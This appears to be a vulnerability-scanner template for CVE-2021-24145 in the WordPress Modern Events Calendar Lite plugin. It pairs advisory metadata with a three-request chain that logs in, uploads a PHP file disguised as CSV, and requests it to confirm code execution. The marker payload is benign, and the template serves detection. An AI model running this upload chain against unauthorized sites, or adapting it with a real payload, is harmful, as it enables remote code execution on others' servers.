id: CVE-2021-24145

info:
  name: WordPress Modern Events Calendar Lite <5.16.5 - Authenticated Arbitrary File Upload
  author: theamanrawat
  severity: high
  description: |
    WordPress Modern Events Calendar Lite plugin before 5.16.5 is susceptible to authenticated arbitrary file upload. The plugin does not properly check the imported file, allowing PHP files to be uploaded and/or executed by an administrator or other high-privilege user using the text/csv content-type in the request. This can possibly lead to remote code execution.
  remediation: Fixed in version 5.16.5.
  reference:
    - https://wpscan.com/vulnerability/f42cc26b-9aab-4824-8168-b5b8571d1610
    - https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.15.5.zip
    - https://github.com/dnr6419/CVE-2021-24145
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24145
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2021-24145
    cwe-id: CWE-434
    epss-score: 0.93725
    epss-percentile: 0.98894
    cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: webnus
    product: modern_events_calendar_lite
    framework: wordpress
  tags: auth,wpscan,cve,wordpress,wp-plugin,wp,modern-events-calendar-lite,cve2021,rce,intrusive

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        POST /wp-admin/admin.php?page=MEC-ix&tab=MEC-import HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Content-Type: multipart/form-data; boundary=---------------------------132370916641787807752589698875

        -----------------------------132370916641787807752589698875
        Content-Disposition: form-data; name="feed"; filename="{{randstr}}.php"
        Content-Type: text/csv

        <?php echo 'CVE-2021-24145'; ?>

        -----------------------------132370916641787807752589698875
        Content-Disposition: form-data; name="mec-ix-action"

        import-start-bookings
        -----------------------------132370916641787807752589698875--
      - |
        GET /wp-content/uploads/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - contains(header_3, "text/html")
          - status_code_3 == 200
          - contains(body_3, 'CVE-2021-24145')
        condition: and
# digest: 4b0a00483046022100d63a9f610fac887aa79576d6d9c737ab89ba2dd43219f9605c5aecf00d58f879022100f112299483a18228eaf5e63b078bb7ed1074b1c0bd00aaf880b18d7782b2f3b0:922c64590222798bb761d5b6d8e72950